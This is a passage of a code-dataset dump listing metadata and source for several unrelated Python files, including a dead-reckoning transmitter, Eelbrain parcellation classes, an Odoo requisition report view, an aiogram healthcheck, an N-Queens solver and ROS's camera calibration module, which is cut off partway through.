blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
sequencelengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
99fc264e361c08fda18f058be8e53b400b61379e | 6ecf40c771874f31fa19f9534677c95c731352e9 | /DRTransmitter.py | d60163c5eddb41d056a1880c6cf332dfa9d71c5b | [] | no_license | fstakem/OptNetFilt | 1c86e82629352ee8ee9eb270aa3be01c6202696d | c862f3d1dd09ad9cdd146871761cb1f814e82de9 | refs/heads/master | 2016-09-11T03:06:06.466206 | 2014-06-07T02:03:04 | 2014-06-07T02:03:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,700 | py | # .------------------------------------------------------------------------------.
# | |
# | D E A D R E C K O N I N G T R A N S M I T T E R |
# | |
# '------------------------------------------------------------------------------'
from copy import *
from Vector import Vector
from Sample import Sample
from PredictionSample import PredictionSample
from Packet import Packet
class DRTransmitter(object):
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# P U B L I C F U N C T I O N S
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
def __init__(self, heartbeatRate):
# Data
self.inputData = []
self.transmittedPackets = []
# Algorithm parameters
self.distanceThreshold = 0.01
self.heartbeatRate = 500
if isinstance( heartbeatRate, int ) and heartbeatRate > 0:
self.heartbeatRate = heartbeatRate
def getTransmittedPackets(self, distanceThreshold, data):
if isinstance( data, list ):
self.inputData = data
if isinstance( distanceThreshold, float ) and distanceThreshold > 0:
self.distanceThreshold = distanceThreshold
self.executeAlgorithm()
return self.transmittedPackets
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# P R I V A T E F U N C T I O N S
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
def executeAlgorithm(self):
self.transmittedPackets = []
sequenceNumber = 1
# Start algorithm before loop
self.transmittedPackets.append( self.createPacket(self.inputData[0], sequenceNumber) )
sequenceNumber += 1
lastTransmittedSample = self.inputData[0]
for predictionSample in self.inputData:
estimatedPosition = self.calculateEstPosition(lastTransmittedSample, \
predictionSample.sample.time)
distance = predictionSample.sample.position.distance(estimatedPosition)
if predictionSample.sample.time >= \
( lastTransmittedSample.sample.time + self.heartbeatRate ):
self.transmittedPackets.append( self.createPacket(predictionSample, sequenceNumber) )
sequenceNumber += 1
lastTransmittedSample = predictionSample
elif distance >= self.distanceThreshold:
self.transmittedPackets.append( self.createPacket(predictionSample, sequenceNumber) )
sequenceNumber += 1
lastTransmittedSample = predictionSample
def calculateEstPosition(self, lastTransmittedSample, currentTime):
deltaTime = currentTime - lastTransmittedSample.sample.time
deltaTimeVector = Vector(deltaTime, deltaTime, deltaTime)
deltaPosition = lastTransmittedSample.velocity * deltaTimeVector
estimatedPosition = lastTransmittedSample.sample.position + deltaPosition
return estimatedPosition
def createPacket(self, predictionSample, sequenceNumber):
packet = Packet()
packet.predictionSample = copy( predictionSample )
packet.sequenceNumber = sequenceNumber
packet.timeTransmitted = predictionSample.sample.time
return packet | [
"[email protected]"
] | |
de83a23717434f077f88e113fd01c3bab8a6fea2 | 4a41223e8c8ab33d83c6f213692c6097bb96540d | /eelbrain/_experiment/parc.py | 9fc979de7443ed56f4acb4c9f91f8447365c11b2 | [
"BSD-3-Clause"
] | permissive | rbaehr/Eelbrain | 33ceeee24533581ab3e7569c31e0f6a6c6dfcda1 | 6301dc256e351fdbb58bbe13ab48fde7bfcf192a | refs/heads/master | 2021-07-05T19:19:20.573231 | 2017-10-03T04:35:23 | 2017-10-03T04:35:23 | 104,907,464 | 0 | 0 | null | 2017-09-26T16:03:20 | 2017-09-26T16:03:20 | null | UTF-8 | Python | false | false | 2,196 | py | import re
COMBINATION_PARC = 'combination'
FS_PARC = 'subject_parc' # Parcellation that come with every MRI-subject
FSA_PARC = 'fsaverage_parc' # Parcellation that comes with fsaverage
SEEDED_PARC = 'seeded'
SEEDED_PARC_RE = re.compile('(\w+)-(\d+)$')
class Parcellation(object):
make = False
morph_from_fsaverage = False
def __init__(self, name, views=None):
self.name = name
self.views = views
def as_dict(self):
return NotImplemented
class CombinationParcellation(Parcellation):
"Recombine labels from an existingparcellation"
make = True
def __init__(self, name, base, labels, views=None):
Parcellation.__init__(self, name, views)
self.base = base
self.labels = labels
def as_dict(self):
return {'kind': COMBINATION_PARC, 'base': self.base,
'labels': self.labels}
class EelbrainParcellation(Parcellation):
"Parcellation that has special make rule"
make = True
def __init__(self, name, morph_from_fsaverage, views=None):
Parcellation.__init__(self, name, views)
self.morph_from_fsaverage = morph_from_fsaverage
def as_dict(self):
return {'kind': 'eelbrain_parc'}
class FreeSurferParcellation(Parcellation):
"Parcellation that comes with FreeSurfer"
def as_dict(self):
return {'kind': FS_PARC}
class FSAverageParcellation(Parcellation):
"Parcellation that comes with FSAverage"
morph_from_fsaverage = True
def as_dict(self):
return {'kind': FSA_PARC}
class SeededParcellation(Parcellation):
"Parcellation that is grown from seed vertices"
make = True
def __init__(self, name, seeds, mask=None, surface='white', views=None):
Parcellation.__init__(self, name, views)
self.seeds = seeds
self.mask = mask
self.surface = surface
def as_dict(self):
return {'kind': SEEDED_PARC, 'seeds': self.seeds,
'surface': self.surface, 'mask': self.mask}
PARC_CLASSES = {
COMBINATION_PARC: CombinationParcellation,
FS_PARC: FreeSurferParcellation,
FSA_PARC: FSAverageParcellation,
SEEDED_PARC: SeededParcellation,
}
| [
"[email protected]"
] | |
69e27cea29749aeb55b8285ea5472f561685d74c | fd9ce5afe2d1160e04071e0645eb823e90ed66bb | /tredis/__init__.py | f38a49bae5e190831d83b61c48569bf1f710f587 | [] | no_license | haoxuu/tredis | b5efb1728ba94e7799547288623241706c9bd9f9 | 506c9a8e3d63b4a654e022f5d8127c8de4c82faf | refs/heads/master | 2021-01-18T16:04:36.292451 | 2017-04-13T12:58:48 | 2017-04-13T12:58:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 234 | py | """
TRedis
======
An asynchronous Redis client for Tornado
"""
from tredis.client import Client, RedisClient
from tredis.exceptions import *
from tredis.strings import BITOP_AND, BITOP_OR, BITOP_XOR, BITOP_NOT
__version__ = '0.7.2'
| [
"[email protected]"
] | |
066775eea5a9fc755660f1f1b211a6359a9d39b9 | eb82022c0cfc7c8747661cff9624ad2099fa1c3f | /accounting_report_xls/wizard/requisition_report.py | b8a86af9ecb7b11cf815777cb5903909435929ab | [] | no_license | dadysuarsa/Odoo | 8d026a066c390cc8f72805d2672212e61260c1cb | c9becd0c192fa239520ad3e1a11d81f70832eddf | refs/heads/master | 2023-03-11T06:02:06.011575 | 2021-02-26T02:17:37 | 2021-02-26T02:17:37 | 276,346,540 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,509 | py | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
#
# Please note that these reports are not multi-currency !!!
#
from odoo import api, fields, models, tools
class RequisitionReport(models.Model):
_name = "requisition.report"
_description = "Requisition Reports"
_auto = False
_order = 'pr_date desc'
pr_date = fields.Datetime('Requisition Date', readonly=True, help="Date on which this document has been created")
product_id = fields.Many2one('product.product', 'Product', readonly=True)
requisition_id = fields.Many2one('po.request', 'Requisition', readonly=True)
purchase_id = fields.Many2one('purchase.order', 'Purchase', readonly=True)
partner_id = fields.Many2one('res.partner', 'Vendor', readonly=True)
uom_id = fields.Many2one('product.uom', 'Unit of Measure', required=True)
pr_qty = fields.Float('PR Qty', readonly=True)
po_qty = fields.Float('PO Qty', readonly=True)
sm_qty = fields.Float('STPB Qty', readonly=True)
@api.model_cr
def init(self):
tools.drop_view_if_exists(self._cr, 'requisition_report')
self._cr.execute("""
create view requisition_report as (
select
min(prl.id) as id,
prl.order_id as requisition_id,
pr.date_trans as pr_date,
pr.divisi as divisi,
prl.product_id as product_id,
prl.product_qty as pr_qty,
po.id as purchase_id,
pol2.product_qty as po_qty,
pol2.price_unit as po_price,
sm.product_uom_qty as sm_qty
from po_request_line prl
left join po_request pr on (pr.id = prl.order_id)
left join purchase_order po on (po.po_request_id = prl.id)
left join purchase_order_line pol on (pol.order_id = po.id)
left join purchase_order_line pol2 on (pol2.product_id = prl.product_id)
left join stock_move sm on (sm.purchase_line_id = pol2.id)
group by
prl.order_id,
pr.date_trans,
pr.divisi,
prl.product_id,
prl.product_qty,
po.id,
pol2.product_qty,
sm.product_uom_qty,
pol2.price_unit
)
""")
| [
"[email protected]"
] | |
2571969d76af0f76eb9cf4d6518aa2ee3cb716ed | 4c207b2dd10db5598ccf5d04ccbf5b272bb1a3ae | /app/services/healthcheck.py | d01f5b6cb3836e30f9e6bcdb524a2b45be854c81 | [
"MIT"
] | permissive | sina-e/bot | 44ede51f498bae10bae59c705dbe42e2d78921cc | 5d892a24724b3cd9b50928f1f5753e8b38d537c4 | refs/heads/master | 2022-03-22T12:32:30.890950 | 2019-11-10T09:53:10 | 2019-11-10T09:53:10 | 244,046,558 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,458 | py | from aiogram import Dispatcher
from aiogram.utils.executor import Executor
from aiohttp_healthcheck import HealthCheck
from loguru import logger
from app import config
health = HealthCheck()
def setup(executor: Executor):
executor.on_startup(on_startup, webhook=True, polling=False)
async def on_startup(dispatcher: Dispatcher):
from app.utils.executor import runner
logger.info("Setup healthcheck")
health.add_check(check_redis)
health.add_check(check_postgres)
health.add_check(check_webhook)
runner.web_app.router.add_get("/healthcheck", health)
async def check_redis():
from app.misc import storage
try:
redis = await storage.redis()
info = await redis.info()
except Exception as e:
return False, str(e)
return True, f"Redis {info['server']['redis_version']}"
async def check_postgres():
from app.models.db import db
try:
version = await db.scalar("select version();")
except Exception as e:
return False, str(e)
return True, version
async def check_webhook():
from app.misc import bot
webhook = await bot.get_webhook_info()
if webhook.url and webhook.url == config.WEBHOOK_URL:
return True, f"Webhook configured. Pending updates count {webhook.pending_update_count}"
else:
logger.error("Configured wrong webhook URL {webhook}", webhook=webhook.url)
return False, "Configured invalid webhook URL"
| [
"[email protected]"
] | |
64aaae03c3ab90f3f0225cbf42dc6b88da545cbb | 8bdce915174678a90a6be811ea91b50930b9d26a | /coding/Algorithm_exercise/Leetcode/0051-N-Queens.py | feda3efdc7bdf33d817beb02ebc76b87d12dbe3e | [] | no_license | CharlesBird/Resources | daefffef8fb3735e656cd0a3bf400d5e2ff85cc0 | 517ac7b7992a686fa5370b6fda8b62663735853c | refs/heads/master | 2022-12-15T02:54:56.530940 | 2020-02-29T14:33:43 | 2020-02-29T14:33:43 | 109,668,108 | 1 | 1 | null | 2022-12-08T05:04:25 | 2017-11-06T08:34:30 | Jupyter Notebook | UTF-8 | Python | false | false | 1,247 | py | """
The n-queens puzzle is the problem of placing n queens on an n×n chessboard such that no two queens attack each other.
Given an integer n, return all distinct solutions to the n-queens puzzle.
Each solution contains a distinct board configuration of the n-queens' placement, where 'Q' and '.' both indicate a queen and an empty space respectively.
Example:
Input: 4
Output: [
[".Q..", // Solution 1
"...Q",
"Q...",
"..Q."],
["..Q.", // Solution 2
"Q...",
"...Q",
".Q.."]
]
Explanation: There exist two distinct solutions to the 4-queens puzzle as shown above.
"""
class Solution:
def solveNQueens(self, n: int) -> 'List[List[str]]':
def valid(cols, index):
for i in range(index):
if abs(cols[i] - cols[index]) == index - i or cols[i] == cols[index]:
return False
return True
def dfs(cols, index, path):
if index == len(cols):
res.append(path)
return
for i in range(len(cols)):
cols[index] = i
if valid(cols, index):
dfs(cols, index+1, path+["."*i+"Q"+"."*(n-i-1)])
res = []
dfs([-1] * n, 0, [])
return res | [
"[email protected]"
] | |
d39d55626150a5f216c292e0bd94792f134a3b53 | 3670f2ca6f5609e14cce8c31cb1348052d0b6358 | /xacro/image_pipeline/camera_calibration/src/camera_calibration/calibrator.py | 48ffaee50b851449e5fbccc9f254a8649ec5cd16 | [] | no_license | jincheng-ai/ros-melodic-python3-opencv4 | b0f4d3860ab7ae3d683ade8aa03e74341eff7fcf | 47c74188560c2274b8304647722d0c9763299a4b | refs/heads/main | 2023-05-28T17:37:34.345164 | 2021-06-17T09:59:25 | 2021-06-17T09:59:25 | 377,856,153 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 53,581 | py | #!/usr/bin/env python
#
# Software License Agreement (BSD License)
#
# Copyright (c) 2009, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of the Willow Garage nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import print_function
try:
from cStringIO import StringIO
except ImportError:
from io import StringIO
from io import BytesIO
import cv2
import cv_bridge
import image_geometry
import math
import numpy.linalg
import pickle
import random
import sensor_msgs.msg
import tarfile
import time
from distutils.version import LooseVersion
import sys
from enum import Enum
# Supported camera models
class CAMERA_MODEL(Enum):
PINHOLE = 0
FISHEYE = 1
# Supported calibration patterns
class Patterns:
Chessboard, Circles, ACircles = list(range(3))
class CalibrationException(Exception):
pass
# TODO: Make pattern per-board?
class ChessboardInfo(object):
def __init__(self, n_cols = 0, n_rows = 0, dim = 0.0):
self.n_cols = n_cols
self.n_rows = n_rows
self.dim = dim
# Make all private!!!!!
def lmin(seq1, seq2):
""" Pairwise minimum of two sequences """
return [min(a, b) for (a, b) in zip(seq1, seq2)]
def lmax(seq1, seq2):
""" Pairwise maximum of two sequences """
return [max(a, b) for (a, b) in zip(seq1, seq2)]
def _pdist(p1, p2):
"""
Distance bwt two points. p1 = (x, y), p2 = (x, y)
"""
return math.sqrt(math.pow(p1[0] - p2[0], 2) + math.pow(p1[1] - p2[1], 2))
def _get_outside_corners(corners, board):
"""
Return the four corners of the board as a whole, as (up_left, up_right, down_right, down_left).
"""
xdim = board.n_cols
ydim = board.n_rows
if corners.shape[1] * corners.shape[0] != xdim * ydim:
raise Exception("Invalid number of corners! %d corners. X: %d, Y: %d" % (corners.shape[1] * corners.shape[0],
xdim, ydim))
up_left = corners[0,0]
up_right = corners[xdim - 1,0]
down_right = corners[-1,0]
down_left = corners[-xdim,0]
return (up_left, up_right, down_right, down_left)
def _get_skew(corners, board):
"""
Get skew for given checkerboard detection.
Scaled to [0,1], which 0 = no skew, 1 = high skew
Skew is proportional to the divergence of three outside corners from 90 degrees.
"""
# TODO Using three nearby interior corners might be more robust, outside corners occasionally
# get mis-detected
up_left, up_right, down_right, _ = _get_outside_corners(corners, board)
def angle(a, b, c):
"""
Return angle between lines ab, bc
"""
ab = a - b
cb = c - b
return math.acos(numpy.dot(ab,cb) / (numpy.linalg.norm(ab) * numpy.linalg.norm(cb)))
skew = min(1.0, 2. * abs((math.pi / 2.) - angle(up_left, up_right, down_right)))
return skew
def _get_area(corners, board):
"""
Get 2d image area of the detected checkerboard.
The projected checkerboard is assumed to be a convex quadrilateral, and the area computed as
|p X q|/2; see http://mathworld.wolfram.com/Quadrilateral.html.
"""
(up_left, up_right, down_right, down_left) = _get_outside_corners(corners, board)
a = up_right - up_left
b = down_right - up_right
c = down_left - down_right
p = b + c
q = a + b
return abs(p[0]*q[1] - p[1]*q[0]) / 2.
def _get_corners(img, board, refine = True, checkerboard_flags=0):
"""
Get corners for a particular chessboard for an image
"""
h = img.shape[0]
w = img.shape[1]
if len(img.shape) == 3 and img.shape[2] == 3:
mono = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
else:
mono = img
(ok, corners) = cv2.findChessboardCorners(mono, (board.n_cols, board.n_rows), flags = cv2.CALIB_CB_ADAPTIVE_THRESH |
cv2.CALIB_CB_NORMALIZE_IMAGE | checkerboard_flags)
if not ok:
return (ok, corners)
# If any corners are within BORDER pixels of the screen edge, reject the detection by setting ok to false
# NOTE: This may cause problems with very low-resolution cameras, where 8 pixels is a non-negligible fraction
# of the image size. See http://answers.ros.org/question/3155/how-can-i-calibrate-low-resolution-cameras
BORDER = 8
if not all([(BORDER < corners[i, 0, 0] < (w - BORDER)) and (BORDER < corners[i, 0, 1] < (h - BORDER)) for i in range(corners.shape[0])]):
ok = False
# Ensure that all corner-arrays are going from top to bottom.
if board.n_rows!=board.n_cols:
if corners[0, 0, 1] > corners[-1, 0, 1]:
corners = numpy.copy(numpy.flipud(corners))
else:
direction_corners=(corners[-1]-corners[0])>=numpy.array([[0.0,0.0]])
if not numpy.all(direction_corners):
if not numpy.any(direction_corners):
corners = numpy.copy(numpy.flipud(corners))
elif direction_corners[0][0]:
corners=numpy.rot90(corners.reshape(board.n_rows,board.n_cols,2)).reshape(board.n_cols*board.n_rows,1,2)
else:
corners=numpy.rot90(corners.reshape(board.n_rows,board.n_cols,2),3).reshape(board.n_cols*board.n_rows,1,2)
if refine and ok:
# Use a radius of half the minimum distance between corners. This should be large enough to snap to the
# correct corner, but not so large as to include a wrong corner in the search window.
min_distance = float("inf")
for row in range(board.n_rows):
for col in range(board.n_cols - 1):
index = row*board.n_rows + col
min_distance = min(min_distance, _pdist(corners[index, 0], corners[index + 1, 0]))
for row in range(board.n_rows - 1):
for col in range(board.n_cols):
index = row*board.n_rows + col
min_distance = min(min_distance, _pdist(corners[index, 0], corners[index + board.n_cols, 0]))
radius = int(math.ceil(min_distance * 0.5))
cv2.cornerSubPix(mono, corners, (radius,radius), (-1,-1),
( cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 30, 0.1 ))
return (ok, corners)
def _get_circles(img, board, pattern):
"""
Get circle centers for a symmetric or asymmetric grid
"""
h = img.shape[0]
w = img.shape[1]
if len(img.shape) == 3 and img.shape[2] == 3:
mono = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
else:
mono = img
flag = cv2.CALIB_CB_SYMMETRIC_GRID
if pattern == Patterns.ACircles:
flag = cv2.CALIB_CB_ASYMMETRIC_GRID
mono_arr = numpy.array(mono)
(ok, corners) = cv2.findCirclesGrid(mono_arr, (board.n_cols, board.n_rows), flags=flag)
# In symmetric case, findCirclesGrid does not detect the target if it's turned sideways. So we try
# again with dimensions swapped - not so efficient.
# TODO Better to add as second board? Corner ordering will change.
if not ok and pattern == Patterns.Circles:
(ok, corners) = cv2.findCirclesGrid(mono_arr, (board.n_rows, board.n_cols), flags=flag)
return (ok, corners)
def _get_dist_model(dist_params, cam_model):
# Select dist model
if CAMERA_MODEL.PINHOLE == cam_model:
if dist_params.size > 5:
dist_model = "rational_polynomial"
else:
dist_model = "plumb_bob"
elif CAMERA_MODEL.FISHEYE == cam_model:
dist_model = "fisheye"
else:
dist_model = "unknown"
return dist_model
# TODO self.size needs to come from CameraInfo, full resolution
class Calibrator(object):
"""
Base class for calibration system
"""
def __init__(self, boards, flags=0, fisheye_flags = 0, pattern=Patterns.Chessboard, name='',
checkerboard_flags=cv2.CALIB_CB_FAST_CHECK, max_chessboard_speed = -1.0):
# Ordering the dimensions for the different detectors is actually a minefield...
if pattern == Patterns.Chessboard:
# Make sure n_cols > n_rows to agree with OpenCV CB detector output
self._boards = [ChessboardInfo(max(i.n_cols, i.n_rows), min(i.n_cols, i.n_rows), i.dim) for i in boards]
elif pattern == Patterns.ACircles:
# 7x4 and 4x7 are actually different patterns. Assume square-ish pattern, so n_rows > n_cols.
self._boards = [ChessboardInfo(min(i.n_cols, i.n_rows), max(i.n_cols, i.n_rows), i.dim) for i in boards]
elif pattern == Patterns.Circles:
# We end up having to check both ways anyway
self._boards = boards
# Set to true after we perform calibration
self.calibrated = False
self.calib_flags = flags
self.fisheye_calib_flags = fisheye_flags
self.checkerboard_flags = checkerboard_flags
self.pattern = pattern
self.br = cv_bridge.CvBridge()
self.camera_model = CAMERA_MODEL.PINHOLE
# self.db is list of (parameters, image) samples for use in calibration. parameters has form
# (X, Y, size, skew) all normalized to [0,1], to keep track of what sort of samples we've taken
# and ensure enough variety.
self.db = []
# For each db sample, we also record the detected corners.
self.good_corners = []
# Set to true when we have sufficiently varied samples to calibrate
self.goodenough = False
self.param_ranges = [0.7, 0.7, 0.4, 0.5]
self.name = name
self.last_frame_corners = None
self.max_chessboard_speed = max_chessboard_speed
def mkgray(self, msg):
"""
Convert a message into a 8-bit 1 channel monochrome OpenCV image
"""
# as cv_bridge automatically scales, we need to remove that behavior
# TODO: get a Python API in cv_bridge to check for the image depth.
if self.br.encoding_to_dtype_with_channels(msg.encoding)[0] in ['uint16', 'int16']:
mono16 = self.br.imgmsg_to_cv2(msg, '16UC1')
mono8 = numpy.array(mono16 / 256, dtype=numpy.uint8)
return mono8
elif 'FC1' in msg.encoding:
# floating point image handling
img = self.br.imgmsg_to_cv2(msg, "passthrough")
_, max_val, _, _ = cv2.minMaxLoc(img)
if max_val > 0:
scale = 255.0 / max_val
mono_img = (img * scale).astype(numpy.uint8)
else:
mono_img = img.astype(numpy.uint8)
return mono_img
else:
return self.br.imgmsg_to_cv2(msg, "mono8")
def get_parameters(self, corners, board, size):
"""
Return list of parameters [X, Y, size, skew] describing the checkerboard view.
"""
(width, height) = size
Xs = corners[:,:,0]
Ys = corners[:,:,1]
area = _get_area(corners, board)
border = math.sqrt(area)
# For X and Y, we "shrink" the image all around by approx. half the board size.
# Otherwise large boards are penalized because you can't get much X/Y variation.
p_x = min(1.0, max(0.0, (numpy.mean(Xs) - border / 2) / (width - border)))
p_y = min(1.0, max(0.0, (numpy.mean(Ys) - border / 2) / (height - border)))
p_size = math.sqrt(area / (width * height))
skew = _get_skew(corners, board)
params = [p_x, p_y, p_size, skew]
return params
def set_cammodel(self, modeltype):
self.camera_model = modeltype
def is_slow_moving(self, corners, last_frame_corners):
"""
Returns true if the motion of the checkerboard is sufficiently low between
this and the previous frame.
"""
# If we don't have previous frame corners, we can't accept the sample
if last_frame_corners is None:
return False
num_corners = len(corners)
corner_deltas = (corners - last_frame_corners).reshape(num_corners, 2)
# Average distance travelled overall for all corners
average_motion = numpy.average(numpy.linalg.norm(corner_deltas, axis = 1))
return average_motion <= self.max_chessboard_speed
def is_good_sample(self, params, corners, last_frame_corners):
"""
Returns true if the checkerboard detection described by params should be added to the database.
"""
if not self.db:
return True
def param_distance(p1, p2):
return sum([abs(a-b) for (a,b) in zip(p1, p2)])
db_params = [sample[0] for sample in self.db]
d = min([param_distance(params, p) for p in db_params])
#print "d = %.3f" % d #DEBUG
# TODO What's a good threshold here? Should it be configurable?
if d <= 0.2:
return False
if self.max_chessboard_speed > 0:
if not self.is_slow_moving(corners, last_frame_corners):
return False
# All tests passed, image should be good for calibration
return True
_param_names = ["X", "Y", "Size", "Skew"]
def compute_goodenough(self):
if not self.db:
return None
# Find range of checkerboard poses covered by samples in database
all_params = [sample[0] for sample in self.db]
min_params = all_params[0]
max_params = all_params[0]
for params in all_params[1:]:
min_params = lmin(min_params, params)
max_params = lmax(max_params, params)
# Don't reward small size or skew
min_params = [min_params[0], min_params[1], 0., 0.]
# For each parameter, judge how much progress has been made toward adequate variation
progress = [min((hi - lo) / r, 1.0) for (lo, hi, r) in zip(min_params, max_params, self.param_ranges)]
# If we have lots of samples, allow calibration even if not all parameters are green
# TODO Awkward that we update self.goodenough instead of returning it
self.goodenough = (len(self.db) >= 40) or all([p == 1.0 for p in progress])
return list(zip(self._param_names, min_params, max_params, progress))
def mk_object_points(self, boards, use_board_size = False):
opts = []
for i, b in enumerate(boards):
num_pts = b.n_cols * b.n_rows
opts_loc = numpy.zeros((num_pts, 1, 3), numpy.float32)
for j in range(num_pts):
opts_loc[j, 0, 0] = (j / b.n_cols)
if self.pattern == Patterns.ACircles:
opts_loc[j, 0, 1] = 2*(j % b.n_cols) + (opts_loc[j, 0, 0] % 2)
else:
opts_loc[j, 0, 1] = (j % b.n_cols)
opts_loc[j, 0, 2] = 0
if use_board_size:
opts_loc[j, 0, :] = opts_loc[j, 0, :] * b.dim
opts.append(opts_loc)
return opts
def get_corners(self, img, refine = True):
"""
Use cvFindChessboardCorners to find corners of chessboard in image.
Check all boards. Return corners for first chessboard that it detects
if given multiple size chessboards.
Returns (ok, corners, board)
"""
for b in self._boards:
if self.pattern == Patterns.Chessboard:
(ok, corners) = _get_corners(img, b, refine, self.checkerboard_flags)
else:
(ok, corners) = _get_circles(img, b, self.pattern)
if ok:
return (ok, corners, b)
return (False, None, None)
def downsample_and_detect(self, img):
"""
Downsample the input image to approximately VGA resolution and detect the
calibration target corners in the full-size image.
Combines these apparently orthogonal duties as an optimization. Checkerboard
detection is too expensive on large images, so it's better to do detection on
the smaller display image and scale the corners back up to the correct size.
Returns (scrib, corners, downsampled_corners, board, (x_scale, y_scale)).
"""
# Scale the input image down to ~VGA size
height = img.shape[0]
width = img.shape[1]
scale = math.sqrt( (width*height) / (640.*480.) )
if scale > 1.0:
scrib = cv2.resize(img, (int(width / scale), int(height / scale)))
else:
scrib = img
# Due to rounding, actual horizontal/vertical scaling may differ slightly
x_scale = float(width) / scrib.shape[1]
y_scale = float(height) / scrib.shape[0]
if self.pattern == Patterns.Chessboard:
# Detect checkerboard
(ok, downsampled_corners, board) = self.get_corners(scrib, refine = True)
# Scale corners back to full size image
corners = None
if ok:
if scale > 1.0:
# Refine up-scaled corners in the original full-res image
# TODO Does this really make a difference in practice?
corners_unrefined = downsampled_corners.copy()
corners_unrefined[:, :, 0] *= x_scale
corners_unrefined[:, :, 1] *= y_scale
radius = int(math.ceil(scale))
if len(img.shape) == 3 and img.shape[2] == 3:
mono = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
else:
mono = img
cv2.cornerSubPix(mono, corners_unrefined, (radius,radius), (-1,-1),
( cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 30, 0.1 ))
corners = corners_unrefined
else:
corners = downsampled_corners
else:
# Circle grid detection is fast even on large images
(ok, corners, board) = self.get_corners(img)
# Scale corners to downsampled image for display
downsampled_corners = None
if ok:
if scale > 1.0:
downsampled_corners = corners.copy()
downsampled_corners[:,:,0] /= x_scale
downsampled_corners[:,:,1] /= y_scale
else:
downsampled_corners = corners
return (scrib, corners, downsampled_corners, board, (x_scale, y_scale))
@staticmethod
def lrmsg(d, k, r, p, size, camera_model):
""" Used by :meth:`as_message`. Return a CameraInfo message for the given calibration matrices """
msg = sensor_msgs.msg.CameraInfo()
msg.width, msg.height = size
msg.distortion_model = _get_dist_model(d, camera_model)
msg.D = numpy.ravel(d).copy().tolist()
msg.K = numpy.ravel(k).copy().tolist()
msg.R = numpy.ravel(r).copy().tolist()
msg.P = numpy.ravel(p).copy().tolist()
return msg
@staticmethod
def lrreport(d, k, r, p):
print("D =", numpy.ravel(d).tolist())
print("K =", numpy.ravel(k).tolist())
print("R =", numpy.ravel(r).tolist())
print("P =", numpy.ravel(p).tolist())
@staticmethod
def lrost(name, d, k, r, p, size):
assert k.shape == (3, 3)
assert r.shape == (3, 3)
assert p.shape == (3, 4)
calmessage = "\n".join([
"# oST version 5.0 parameters",
"",
"",
"[image]",
"",
"width",
"%d" % size[0],
"",
"height",
"%d" % size[1],
"",
"[%s]" % name,
"",
"camera matrix",
" ".join("%8f" % k[0,i] for i in range(3)),
" ".join("%8f" % k[1,i] for i in range(3)),
" ".join("%8f" % k[2,i] for i in range(3)),
"",
"distortion",
" ".join("%8f" % x for x in d.flat),
"",
"rectification",
" ".join("%8f" % r[0,i] for i in range(3)),
" ".join("%8f" % r[1,i] for i in range(3)),
" ".join("%8f" % r[2,i] for i in range(3)),
"",
